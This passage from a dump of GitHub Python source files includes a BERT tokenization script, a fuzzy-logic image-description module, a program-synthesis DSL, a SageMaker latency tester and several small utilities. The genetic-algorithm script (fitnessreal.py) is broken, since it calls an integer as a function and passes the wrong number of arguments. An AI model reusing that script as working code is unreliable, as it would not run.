pool.map(partial_compare, mis_list[:100])\r\n\r\n accuracy = identity(cor_list[:100], result)\r\n print(accuracy)\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running...\")\r\n check()\r\n","repo_name":"Elfsong/WintersWrath","sub_path":"KT/Soundex/Soundex.py","file_name":"Soundex.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"5328516786","text":"\nimport random\n\ndef func(x,y):\n j0=1\n return j0(x**2 + y**2) + 0.1 * abs(1 - x) + 0.1 * abs(1 - y)\n\nnum_generations = 100\npop_size = 100\npopulation = [[random.uniform(-10, 10) for _ in range(7)] for _ in range(2000)]\nmut_prob = 0.1\n\n\ndef genetic_algorithm(pop_size, mut_prob, num_generations):\n# Initialize the population with random solutions\n population = [random.random() for _ in range(pop_size)]\n\n # Iterate through the number of generations\n for generation in range(num_generations):\n # Calculate the fitness of each member of the population\n fitness = [func(member) for member in population]\n\n # Select the fittest members of the population for breeding\n breeding_pool = [population[i] for i in range(pop_size) if fitness[i] < min(fitness)]\n\n # Breed the selected members to create the next generation\n next_generation = []\n for i in range(0, pop_size, 2):\n parent1, parent2 = random.choice(breeding_pool), random.choice(breeding_pool)\n next_generation.append(parent1 + (parent2 - parent1) * random.random())\n next_generation.append(parent2 + (parent1 - parent2) * random.random())\n\n # Mutate the next generation with a given probability\n for i in range(pop_size):\n if random.random() < mut_prob:\n next_generation[i] += random.uniform(-1, 1)\n\n # Replace the current population with the next generation\n population = next_generation\n\n# Return the fittest member of the final population\n return min([func(member) for member in population])\n\na = genetic_algorithm(pop_size, mut_prob, num_generations)\nprint(a)","repo_name":"Roy3838/C_testing","sub_path":"Act 4/fitnessreal.py","file_name":"fitnessreal.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30349153563","text":"from uuid import uuid4\r\nfrom datetime import datetime\r\n\r\nclass BaseModel:\r\n def __init__(self, *args, **kwargs):\r\n self.id = str(uuid4())\r\n self.created_at = datetime.today()\r\n \r\n if kwargs:\r\n for key, value in kwargs.items():\r\n if key == \"created_at\":\r\n value = datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%f\")\r\n if key != \"__class__\":\r\n self.__dict__[key] = value\r\n \r\n def __str__(self):\r\n c_name = self.__class__.__name__\r\n return \"[{}] ({}) {}\".format(c_name, self.id, self.__dict__)\r\n \r\n def to_dict(self):\r\n \"\"\"Coverts an object to a dictionary\"\"\"\r\n self_d = self.__dict__.copy()\r\n self_d[\"__class__\"] = self.__class__.__name__\r\n self_d[\"created_at\"] = self.created_at.isoformat()\r\n return self_d\r\n\r\n\r\n#new_class = BaseModel()\r\n#print(new_class)\r\n\r\n#obj_dict = {\r\n #\"id\": \"b7415ed3-48a0-4da1-afed-49cc7aa08256\",\r\n # \"created_at\": \"2022-08-24T20:25:50.018811\",\r\n # }\r\n#new_class = BaseModel(**obj_dict)\r\n#print(new_class)","repo_name":"Mwambingu/AirBnB_clone","sub_path":"Backup/tutz/test_inheritance/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72478745372","text":"from collections import namedtuple\nfrom unittest.mock import AsyncMock, patch\n\nimport pytest\n\nfrom http_nudger.persister import consume_batch\n\n\n@pytest.mark.asyncio\n@patch(\"aiokafka.AIOKafkaConsumer\")\n@patch(\"http_nudger.url_status.UrlStatus.from_json\")\nasync def test_consume_batch(url_status_from_json_mock, aio_kafka_consumer_mock):\n ConsumerRecord = namedtuple(\"ConsumerRecord\", [\"value\"])\n aio_kafka_consumer_mock.getmany = AsyncMock()\n aio_kafka_consumer_mock.getmany.return_value = {\n \"topic1\": [ConsumerRecord(\"msg1\")],\n \"topic2\": [ConsumerRecord(\"msg2\")],\n \"topic3\": [ConsumerRecord(\"msg3\")],\n }\n url_status_from_json_mock.side_effect = [\"something1\", \"something2\", ValueError]\n\n batch = await consume_batch(aio_kafka_consumer_mock)\n assert len(batch) == 2\n","repo_name":"askolosov/http-nudger","sub_path":"tests/test_persister.py","file_name":"test_persister.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34046200972","text":"from transformers import BertTokenizer\nimport pandas as pd\nfrom keras_preprocessing.sequence import pad_sequences\nfrom torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\nimport torch\n# import urllib.request\n\n# urllib.request.urlretrieve(\"https://raw.githubusercontent.com/e9t/nsmc/master/ratings_train.txt\", filename=\"ratings_train.txt\")\n# urllib.request.urlretrieve(\"https://raw.githubusercontent.com/e9t/nsmc/master/ratings_test.txt\", filename=\"ratings_test.txt\")\n\ntrain_data = pd.read_table('ratings_train.txt')\ntest_data = pd.read_table('ratings_test.txt')\n\nprint(train_data.shape)\nprint(train_data.groupby('label').count())\n\n# bert tokenizer\ntokenizer = BertTokenizer.from_pretrained('bert-base-multilingual-cased', do_lower_case = False)\n\ndata = train_data['document'].values\ndocuments = [\"[CLS] \" + str(d) + \" [SEP]\" for d in data]\ntokenized_doc = [tokenizer.tokenize(s) for s in documents]\n\nprint(documents[:3])\nprint(tokenized_doc[:3])\n\ninput_ids = [tokenizer.convert_tokens_to_ids(x) for x in tokenized_doc]\ninput_id = pad_sequences(input_ids, maxlen = 128, dtype = 'long',\n truncating = 'post', padding = 'post')\n\nprint(len(input_ids))\nprint(input_ids[:3])\n\nprint(input_id.shape)\nprint(input_id[:3])\n\nattention_masks = []\nfor seq in input_id:\n seq_mask = [float(i > 0) for i in seq]\n attention_masks.append(seq_mask)\nprint(attention_masks[:3])\n\ndata = TensorDataset(torch.tensor(input_id), torch.tensor(attention_masks), torch.tensor(train_data['label'].values))\ndata_seq = TensorDataset(torch.tensor(input_id), torch.tensor(attention_masks), torch.tensor([-1] * len(train_data)))\n\n# RandomSampler: shuffle, SequentialSampler: No-Shuffle\nsampler = RandomSampler(data)\nseq_sampler = SequentialSampler(data_seq)\ndata_loader = DataLoader(data, sampler = sampler, batch_size = 3)\ndata_loader_seq = DataLoader(data_seq, sampler = seq_sampler, batch_size = 3)\n\nfor i, b in enumerate(data_loader):\n if i == 1:\n break\n x = b[0]\n y = b[1]\n z = b[2]\n print(x)\n print(y)\n print(z)\n\nfor i, b in enumerate(data_loader_seq):\n if i == 1:\n break\n x = b[0]\n y = b[1]\n z = b[2]\n print(x)\n print(y)\n print(z)","repo_name":"catssci/NLP","sub_path":"한국어 임베딩/문장 수준 임베딩/BERT.py","file_name":"BERT.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37206299820","text":"# This file is used to create a description of bounding boxes on the picture found by YOLOv3\n# described in a json file.\n\nimport common\n\nsettings_file = \"settings/test.txt\"\n\n\ndef location_description(field_height, field_width, objects):\n # Properties - name, saliency(0-1), argument_type, mem_values - values for the membership function,\n # sentence - the description\n # assumed that all are trapezoid membership function\n class Property:\n def __init__(self, name, saliency, argument_type, mem_values, sentence):\n self.name = name\n self.saliency = saliency\n self.argument_type = argument_type\n self.mem_values = mem_values\n self.sentence = sentence\n\n f = open(settings_file, \"r\")\n property_lines = []\n relation_lines = []\n rule_lines = []\n kind_of_predicate = -1 # 0 - property, 1- relation, 2 - rule\n for x in f:\n if x.startswith('#'):\n kind_of_predicate = kind_of_predicate + 1\n continue\n if kind_of_predicate == 0:\n property_lines.append(x)\n elif kind_of_predicate == 1:\n relation_lines.append(x)\n elif kind_of_predicate == 2:\n rule_lines.append(x)\n else:\n print(\"Something went wrong in reading settings file!\")\n\n properties = []\n relations = []\n rules = []\n for prop in property_lines:\n propParams = prop.split(',')\n properties.append(Property(propParams[0], float(propParams[1]), propParams[2],\n propParams[3].split(';'), propParams[4].replace('\\n', '')))\n for rel in relation_lines:\n propParams = rel.split(',')\n relations.append(Property(propParams[0], float(propParams[1]), propParams[2],\n propParams[3].split(';'), propParams[4].replace('\\n', '')))\n\n # Rules - name, saliency(0-1), prop1, prop2 - properties that need to be true to this rule to activate,\n # operator - operator that joins two properties, sentence - the description\n # assumed that all are trapezoid membership function\n class Rule:\n def __init__(self, name, saliency, prop1, prop2, operator, sentence):\n self.name = name\n self.saliency = saliency\n self.prop1 = prop1\n self.prop2 = prop2\n self.operator = operator\n self.sentence = sentence\n\n for rule in rule_lines:\n propParams = rule.split(',')\n rules.append(Rule(propParams[0], int(propParams[1]), properties[int(propParams[2])].name,\n properties[int(propParams[3])].name, propParams[4], propParams[5].replace('\\n', '')))\n\n # Normalize objects properties by the size of the image\n for obj in objects:\n obj.boundary_left = 2 * obj.x / field_width - 1\n obj.boundary_right = 2 * (obj.x + obj.width) / field_width - 1\n obj.boundary_top = 2 * obj.y / field_height - 1\n obj.boundary_bottom = 2 * (obj.y + obj.height) / field_height - 1\n obj.size = (obj.width / field_width) * (obj.height / field_height) # saliency\n obj.width_center = (obj.boundary_right + obj.boundary_left)/2\n obj.height_center = (obj.boundary_bottom + obj.boundary_top)/2\n\n # Calculate membership function x value based on normalized properties of the object\n def membership_function_x_value(type, obj, obj2):\n if type == 'b_l': # left side\n return obj.boundary_left\n elif type == 'b_r': # right side\n return obj.boundary_right\n elif type == 'c_lr': # center of width\n return (obj.boundary_left + obj.boundary_right) / 2\n elif type == 'b_t': # top\n return obj.boundary_top\n elif type == 'b_b': # bottom\n return obj.boundary_bottom\n elif type == 'c_tb': # center of height\n return (obj.boundary_top + obj.boundary_bottom) / 2\n elif type == 'd_lr': # distance between width centroids\n return (obj.boundary_right + obj.boundary_left) / 2 - (obj2.boundary_right + obj2.boundary_left) / 2\n elif type == 'd_tb': # distance between height centroids\n return (obj.boundary_top + obj.boundary_bottom) / 2 - (obj2.boundary_top + obj2.boundary_bottom) / 2\n elif type == 'd_left': # distance between A.right and B.left\n if obj2.boundary_right < obj.boundary_left or (obj.boundary_left < obj2.boundary_left and obj.boundary_right > obj2.boundary_right):\n return -5000\n return abs(obj2.boundary_left - obj.boundary_right) + abs(obj.height_center - obj2.height_center)\n elif type == 'd_right': # distance between A.left and B.right\n if obj.boundary_left < obj2.boundary_right or (\n obj.boundary_left < obj2.boundary_left and obj.boundary_right > obj2.boundary_right):\n return -5000\n return abs(obj.boundary_left - obj2.boundary_right) + abs(obj.height_center - obj2.height_center)\n elif type == 'd_below': # distance between A.top and B.down\n if obj.boundary_bottom < obj2.boundary_top or (\n obj.boundary_top < obj2.boundary_top and obj.boundary_bottom > obj2.boundary_bottom):\n return -5000\n return abs(obj.boundary_top - obj2.boundary_bottom) + abs(obj.width_center - obj2.width_center)\n elif type == 'd_above': # distance between B.top and A.down\n if obj.boundary_top > obj2.boundary_bottom or (\n obj.boundary_top < obj2.boundary_top and obj.boundary_bottom > obj2.boundary_bottom):\n return -5000\n return abs(obj2.boundary_top - obj.boundary_bottom) + abs(obj.width_center - obj2.width_center)\n elif type == 'd_inside':\n if obj2.boundary_left > obj.boundary_left or obj2.boundary_right < obj.boundary_right or obj2.boundary_top > obj.boundary_top or obj2.boundary_bottom < obj.boundary_bottom :\n return -5000\n return 0 # it should give the membership function value = 1\n elif type == 'd':\n print(\"Not supported\")\n return 7000\n else:\n print(\"Something went wrong during calculating membership x value;/\")\n return -7100\n\n # Calculate membership y value based on x value and the membership function\n def membership_y_value(property, value):\n if value < float(property.mem_values[0]):\n return 0\n elif value < float(property.mem_values[1]):\n return (value - float(property.mem_values[0])) / (\n float(property.mem_values[1]) - float(property.mem_values[0]))\n elif value < float(property.mem_values[2]):\n return 1\n elif value < float(property.mem_values[3]):\n return (float(property.mem_values[3]) - value) / (\n float(property.mem_values[3]) - float(property.mem_values[2]))\n else:\n return 0\n\n # Membership Value Function of an object to specific property\n obj_prop = []\n for prop in properties:\n temp = []\n for obj in objects:\n temp.append(membership_y_value(prop, membership_function_x_value(prop.argument_type, obj, 0)))\n obj_prop.append(temp)\n\n # Membership Value Function of two objects to specific relation\n obj_rel = []\n for rel in relations:\n tempOutside = []\n for objOutside in objects:\n tempInside = []\n for objInside in objects:\n tempInside.append(\n membership_y_value(rel, membership_function_x_value(rel.argument_type, objOutside, objInside)))\n tempOutside.append(tempInside)\n obj_rel.append(tempOutside)\n\n # Add predicates - name, certainty factor, is_used, number of object, number of second object (for relations only),\n # number of property/relation, membership value\n pred = []\n rel_pred = []\n for i in range(len(objects)):\n for j in range(len(properties)):\n if obj_prop[j][i] > 0:\n temp = [properties[j].name, obj_prop[j][i] * objects[i].size * properties[j].saliency, 0, i, -1, j,\n obj_prop[j][i]]\n pred.append(temp)\n\n for k in range(len(objects)):\n for j in range(len(relations)):\n if obj_rel[j][i][k] > 0 and i != k:\n temp = [relations[j].name, obj_rel[j][i][k]* relations[j].saliency, 0, i, k, j, obj_rel[j][i][k]]\n # deleted multiplying by size of object in relations\n rel_pred.append(temp)\n\n for i in range(len(rules)):\n for j in range(len(pred)):\n if pred[j][0] == rules[i].prop1:\n obj_found = pred[j][3]\n for k in range(len(pred)):\n if pred[k][0] == rules[i].prop2 and pred[k][3] == obj_found:\n if pred[j][6] != 0 and pred[k][6] != 0:\n ruleobj_cf = min(pred[j][6], pred[k][6]) # assumed it's min value\n temp = [rules[i].name, ruleobj_cf * objects[obj_found].size * rules[i].saliency, 0,\n obj_found,\n -2, i, ruleobj_cf]\n pred.append(temp)\n # Sort\n rel_pred.sort(key=lambda p: p[1], reverse=True)\n\n # for pr in rel_pred: # pr[5]-> number of relations\n # print(objects[pr[3]].name + \" \" + relations[pr[5]].sentence + \" \" + objects[pr[4]].name + \" CF: \" + str(pr[1]))\n\n # Sort\n pred.sort(key=lambda p: p[1], reverse=True)\n # print(\"sorted predicates:\")\n # for pr in pred:\n # if pr[4] == -1:\n # print(objects[pr[3]].name + \" \" + properties[pr[5]].sentence + \" CF: \" + str(pr[1]))\n # elif pr[4] == -2:\n # print(objects[pr[3]].name + \" \" + rules[pr[5]].sentence + \" CF: \" + str(pr[1]))\n # else:\n # print(objects[pr[3]].name + \" \" + relations[pr[5]].sentence + \" \" + objects[pr[4]].name + \" CF: \" + str(\n # pr[1]))\n\n def kindOfPredicate(pred):\n if pred[4] == -1: # property\n if properties[pred[5]].argument_type == 'b_l' or properties[pred[5]].argument_type == 'c_lr' or properties[\n pred[5]].argument_type == 'b_r':\n return 'X'\n if pred[4] == -2: # rule\n if rules[pred[5]].name == 'width':\n return 'X'\n if rules[pred[5]].name == 'height':\n return 'Y'\n return 'BOTH'\n return 'Y'\n\n # Predicate selection\n usedX = []\n usedY = []\n for obj in objects:\n usedX.append(0)\n usedY.append(0)\n\n for i in range(len(pred)):\n if kindOfPredicate(pred[i]) == 'BOTH':\n if usedX[pred[i][3]] < 1 and usedY[pred[i][3]] < 1:\n usedX[pred[i][3]] = usedX[pred[i][3]] + 1\n usedY[pred[i][3]] = usedY[pred[i][3]] + 1\n pred[i][2] = 1\n elif kindOfPredicate(pred[i]) == 'X':\n if usedX[pred[i][3]] < 1:\n usedX[pred[i][3]] = usedX[pred[i][3]] + 1\n pred[i][2] = 1\n else:\n if usedY[pred[i][3]] < 1:\n usedY[pred[i][3]] = usedY[pred[i][3]] + 1\n pred[i][2] = 1\n pred_out = []\n for i in range(len(pred)):\n if pred[i][1] > 0 and pred[i][2] == 1:\n pred_out.append(pred[i])\n\n # Print sentences\n desc = []\n sentence = ''\n for i in range(len(pred_out)):\n if pred_out[i][4] == -1: # predicate\n sentence = objects[pred_out[i][3]].name + \" \" + properties[pred_out[i][5]].sentence\n elif pred_out[i][4] == -2: # rule\n sentence = objects[pred_out[i][3]].name + \" \" + rules[pred_out[i][5]].sentence\n sentence = sentence.capitalize()\n desc.append(sentence)\n\n usedRel = []\n for obj in objects:\n usedRel.append(0)\n\n # relations:\n for i in range(len(rel_pred)):\n # print(\"REL: \" + str(rel_pred[i][1])) -> to print values for relations\n # Decided to use every object once (at least if there is an even number of them)\n if usedRel[rel_pred[i][3]] == 1 or usedRel[rel_pred[i][4]] == 1:\n continue\n sentence = objects[rel_pred[i][3]].name + \" \" + relations[rel_pred[i][5]].sentence + \" \" + objects[\n rel_pred[i][4]].name + '.'\n sentence = sentence.capitalize()\n usedRel[rel_pred[i][3]] = 1\n usedRel[rel_pred[i][4]] = 1\n desc.append(sentence)\n\n TEXT = ''\n for description in desc:\n TEXT = TEXT + description + '\\n'\n return TEXT\n","repo_name":"sebek5000/magisterka","sub_path":"location_description.py","file_name":"location_description.py","file_ext":"py","file_size_in_byte":12658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37943876296","text":"from synth.semantic import DSLEvaluator\nfrom synth.syntax import DSL, INT, Arrow, PolymorphicType, List\n\nt0 = PolymorphicType(\"t0\")\nt1 = PolymorphicType(\"t1\")\n\n\ndef __access__(i, l):\n if i is None:\n return None\n elif (i >= 0 and len(l) > i) or (i < 0 and len(l) >= -i):\n return l[i]\n else:\n return None\n\n\ndef __scanl__(op):\n def aux(l):\n if len(l) == 0:\n return []\n else:\n y = [l[0]]\n for x in l[1:]:\n last = y[-1]\n y.append(op(last, x))\n return y\n\n return aux\n\n\n__semantics = {\n \"HEAD\": lambda l: l[0] if len(l) > 0 else None,\n \"TAIL\": lambda l: l[-1] if len(l) > 0 else None,\n \"ACCESS\": lambda i: lambda l: __access__(i, l),\n \"MINIMUM\": lambda l: min(l) if len(l) > 0 else None,\n \"MAXIMUM\": lambda l: max(l) if len(l) > 0 else None,\n \"LENGTH\": lambda l: len(l),\n \"COUNT[<0]\": lambda l: len([x for x in l if x < 0]),\n \"COUNT[>0]\": lambda l: len([x for x in l if x > 0]),\n \"COUNT[EVEN]\": lambda l: len([x for x in l if x % 2 == 0]),\n \"COUNT[ODD]\": lambda l: len([x for x in l if x % 2 == 1]),\n \"SUM\": lambda l: sum(l),\n \"TAKE\": lambda i: lambda l: l[:i],\n \"DROP\": lambda i: lambda l: l[i:],\n \"SORT\": lambda l: sorted(l),\n \"REVERSE\": lambda l: l[::-1],\n \"FILTER[<0]\": lambda l: [x for x in l if x < 0],\n \"FILTER[>0]\": lambda l: [x for x in l if x > 0],\n \"FILTER[EVEN]\": lambda l: [x for x in l if x % 2 == 0],\n \"FILTER[ODD]\": lambda l: [x for x in l if x % 2 == 1],\n \"MAP[+1]\": lambda l: [x + 1 for x in l],\n \"MAP[-1]\": lambda l: [x - 1 for x in l],\n \"MAP[*2]\": lambda l: [x * 2 for x in l],\n \"MAP[/2]\": lambda l: [int(x / 2) for x in l],\n \"MAP[*3]\": lambda l: [x * 3 for x in l],\n \"MAP[/3]\": lambda l: [int(x / 3) for x in l],\n \"MAP[*4]\": lambda l: [x * 4 for x in l],\n \"MAP[/4]\": lambda l: [int(x / 4) for x in l],\n \"MAP[**2]\": lambda l: [x**2 for x in l],\n \"MAP[*-1]\": lambda l: [-x for x in l],\n \"ZIPWITH[+]\": lambda l1: lambda l2: [x + y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[-]\": lambda l1: lambda l2: [x - y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[*]\": lambda l1: lambda l2: [x * y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[max]\": lambda l1: lambda l2: [\n (x if x > y else y) for (x, y) in zip(l1, l2)\n ],\n \"ZIPWITH[min]\": lambda l1: lambda l2: [\n (y if x > y else x) for (x, y) in zip(l1, l2)\n ],\n \"SCAN1L[+]\": __scanl__(lambda x, y: x + y),\n \"SCAN1L[-]\": __scanl__(lambda x, y: x - y),\n \"SCAN1L[*]\": __scanl__(lambda x, y: x * y),\n \"SCAN1L[min]\": __scanl__(lambda x, y: min(x, y)),\n \"SCAN1L[max]\": __scanl__(lambda x, y: max(x, y)),\n # 'MAP': lambda f: lambda l: list(map(f, l)),\n}\n\n__primitive_types = {\n \"HEAD\": Arrow(List(INT), INT),\n \"TAIL\": Arrow(List(INT), INT),\n \"ACCESS\": Arrow(INT, Arrow(List(INT), INT)),\n \"MINIMUM\": Arrow(List(INT), INT),\n \"MAXIMUM\": Arrow(List(INT), INT),\n \"LENGTH\": Arrow(List(INT), INT),\n \"COUNT[<0]\": Arrow(List(INT), INT),\n \"COUNT[>0]\": Arrow(List(INT), INT),\n \"COUNT[EVEN]\": Arrow(List(INT), INT),\n \"COUNT[ODD]\": Arrow(List(INT), INT),\n \"SUM\": Arrow(List(INT), INT),\n \"TAKE\": Arrow(INT, Arrow(List(INT), List(INT))),\n \"DROP\": Arrow(INT, Arrow(List(INT), List(INT))),\n \"SORT\": Arrow(List(INT), List(INT)),\n \"REVERSE\": Arrow(List(INT), List(INT)),\n \"FILTER[<0]\": Arrow(List(INT), List(INT)),\n \"FILTER[>0]\": Arrow(List(INT), List(INT)),\n \"FILTER[EVEN]\": Arrow(List(INT), List(INT)),\n \"FILTER[ODD]\": Arrow(List(INT), List(INT)),\n \"MAP[+1]\": Arrow(List(INT), List(INT)),\n \"MAP[-1]\": Arrow(List(INT), List(INT)),\n \"MAP[*2]\": Arrow(List(INT), List(INT)),\n \"MAP[/2]\": Arrow(List(INT), List(INT)),\n \"MAP[*-1]\": Arrow(List(INT), List(INT)),\n \"MAP[**2]\": Arrow(List(INT), List(INT)),\n \"MAP[*3]\": Arrow(List(INT), List(INT)),\n \"MAP[/3]\": Arrow(List(INT), List(INT)),\n \"MAP[*4]\": Arrow(List(INT), List(INT)),\n \"MAP[/4]\": Arrow(List(INT), List(INT)),\n \"ZIPWITH[+]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[-]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[*]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[min]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[max]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"SCAN1L[+]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[-]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[*]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[min]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[max]\": Arrow(List(INT), List(INT)),\n # 'MAP': Arrow(Arrow(t0,t1),Arrow(List(t0),List(t1))),\n}\n\n\n__forbidden_patterns = [\n [\"HEAD\", \"SCAN1L[-]\"],\n [\"HEAD\", \"SCAN1L[min]\"],\n [\"HEAD\", \"SCAN1L[*]\"],\n [\"HEAD\", \"SCAN1L[max]\"],\n [\"HEAD\", \"SCAN1L[+]\"],\n [\"MINIMUM\", \"SORT\"],\n [\"MINIMUM\", \"REVERSE\"],\n [\"MINIMUM\", \"SCAN1L[min]\"],\n [\"MAXIMUM\", \"REVERSE\"],\n [\"MAXIMUM\", \"SORT\"],\n [\"MAXIMUM\", \"SCAN1L[max]\"],\n [\"LENGTH\", \"MAP[/4]\"],\n [\"LENGTH\", \"MAP[**2]\"],\n [\"LENGTH\", \"SCAN1L[max]\"],\n [\"LENGTH\", \"MAP[+1]\"],\n [\"LENGTH\", \"SORT\"],\n [\"LENGTH\", \"MAP[/3]\"],\n [\"LENGTH\", \"SCAN1L[*]\"],\n [\"LENGTH\", \"MAP[*2]\"],\n [\"LENGTH\", \"MAP[*3]\"],\n [\"LENGTH\", \"SCAN1L[+]\"],\n [\"LENGTH\", \"MAP[*-1]\"],\n [\"LENGTH\", \"MAP[/2]\"],\n [\"LENGTH\", \"SCAN1L[-]\"],\n [\"LENGTH\", \"SCAN1L[min]\"],\n [\"LENGTH\", \"REVERSE\"],\n [\"LENGTH\", \"MAP[-1]\"],\n [\"LENGTH\", \"MAP[*4]\"],\n [\"COUNT[<0]\", \"MAP[*2]\"],\n [\"COUNT[<0]\", \"SORT\"],\n [\"COUNT[<0]\", \"MAP[*3]\"],\n [\"COUNT[<0]\", \"MAP[*4]\"],\n [\"COUNT[<0]\", \"REVERSE\"],\n [\"COUNT[<0]\", \"FILTER[<0]\"],\n [\"COUNT[>0]\", \"SORT\"],\n [\"COUNT[>0]\", \"MAP[*3]\"],\n [\"COUNT[>0]\", \"MAP[-1]\"],\n [\"COUNT[>0]\", \"FILTER[>0]\"],\n [\"COUNT[>0]\", \"MAP[/2]\"],\n [\"COUNT[>0]\", \"MAP[*4]\"],\n [\"COUNT[>0]\", \"REVERSE\"],\n [\"COUNT[>0]\", \"MAP[*2]\"],\n [\"COUNT[EVEN]\", \"REVERSE\"],\n [\"COUNT[EVEN]\", \"MAP[**2]\"],\n [\"COUNT[EVEN]\", \"FILTER[EVEN]\"],\n [\"COUNT[EVEN]\", \"MAP[*3]\"],\n [\"COUNT[EVEN]\", \"SORT\"],\n [\"COUNT[EVEN]\", \"MAP[*-1]\"],\n [\"COUNT[ODD]\", \"REVERSE\"],\n [\"COUNT[ODD]\", \"FILTER[ODD]\"],\n [\"COUNT[ODD]\", \"MAP[**2]\"],\n [\"COUNT[ODD]\", \"MAP[*3]\"],\n [\"COUNT[ODD]\", \"SORT\"],\n [\"COUNT[ODD]\", \"MAP[*-1]\"],\n [\"SUM\", \"SORT\"],\n [\"SUM\", \"REVERSE\"],\n [\"SORT\", \"REVERSE\"],\n [\"SORT\", \"SORT\"],\n [\"REVERSE\", \"REVERSE\"],\n [\"FILTER[<0]\", \"FILTER[<0]\"],\n [\"FILTER[>0]\", \"FILTER[>0]\"],\n [\"FILTER[EVEN]\", \"FILTER[EVEN]\"],\n [\"FILTER[ODD]\", \"FILTER[ODD]\"],\n [\"MAP[+1]\", \"MAP[-1]\"],\n [\"MAP[-1]\", \"MAP[+1]\"],\n [\"MAP[/2]\", \"MAP[*2]\"],\n [\"MAP[*-1]\", \"MAP[*-1]\"],\n [\"MAP[**2]\", \"MAP[*-1]\"],\n [\"MAP[/3]\", \"MAP[*3]\"],\n [\"MAP[/4]\", \"MAP[*4]\"],\n [\"SCAN1L[min]\", \"SCAN1L[min]\"],\n [\"SCAN1L[max]\", \"SCAN1L[max]\"],\n]\n\ndsl = DSL(__primitive_types, __forbidden_patterns)\nevaluator = DSLEvaluator(__semantics)\nevaluator.skip_exceptions.add(OverflowError)\nlexicon = list(range(-256, 256 + 1))\n","repo_name":"nathanael-fijalkow/ProgSynth","sub_path":"examples/nlp/conala/conala.py","file_name":"conala.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"24083320608","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('haishin', '0003_auto_20151211_0858'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='business',\n name='slug',\n field=models.SlugField(default='aa', help_text=b'Se va a generar automaticamente', max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='city',\n name='slug',\n field=models.SlugField(default='vv', help_text=b'Se va a generar automaticamente', max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='country',\n name='url',\n field=models.CharField(max_length=100, null=True, blank=True),\n ),\n ]\n","repo_name":"po5i/haishin_project","sub_path":"haishin/migrations/0004_auto_20151211_1751.py","file_name":"0004_auto_20151211_1751.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41309340769","text":"\"\"\"\n\"\"\"\n#===========================\n# GLOBAL VARIABLES\n#===========================\nfrom astropy.visualization.stretch import LinearStretch, LogStretch, SqrtStretch\n\n\ndata = None\nheader = ''\n\n# Matplotlib display values\nscale_type = {'Linear':LinearStretch(), 'Log':LogStretch(), 'Sqrt':SqrtStretch()}\ncmap = None\n\n# FITS coords\nx1 = 0\nx2 = 0\ny1 = 0\ny2 = 0","repo_name":"PsyJim/AURORA","sub_path":"DCViewer/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39678501276","text":"import boto3\nimport pandas as pd\nimport pickle\nimport sys\nimport time\n\ndef get_time_for_prediction(endpoint_name, content_type, payload):\n t0 = time.time()\n response = runtime_client.invoke_endpoint(EndpointName=endpoint_name,\n ContentType=content_type,\n Body=payload)\n return (time.time() - t0) * 1000\n\ndef load_payload(file_name):\n with open(file_name, 'r') as f:\n payload = f.read().strip()\n return payload\n\nruntime_client = boto3.client('runtime.sagemaker')\n\ntime_data = []\nendpoint_name = 'BuiltInXGBoostEndpointPkl-2018-03-15-20-25-44'\ncontent_type = 'text/csv'\npayload = load_payload(sys.argv[1])\n\nattempts = int(sys.argv[2])\n\nfor i in range(attempts):\n if i % 50 == 0:\n print('The {}-th attempt.'.format(i))\n time_data.append(get_time_for_prediction(endpoint_name, content_type, payload))\n\noutput_file = \"latency-{}\".format(int(time.time()))\nwith open(output_file, 'wb') as f:\n pickle.dump(time_data, f)\n\n# Analyze the data.\ns = pd.Series(time_data)\nprint(s.describe())\nprint('99%-tile latency: {}'.format(s.quantile([.99])))\n","repo_name":"jiwang576/perf_test","sub_path":"local_client.py","file_name":"local_client.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5890861366","text":"from django.shortcuts import get_object_or_404\nfrom graphene_django import DjangoObjectType\nfrom .models import Payment, PremiumPlan\nimport graphene\nfrom zeep.client import Client\nfrom django.conf import settings\nimport logging\n\n\nzarinpal = getattr(settings, 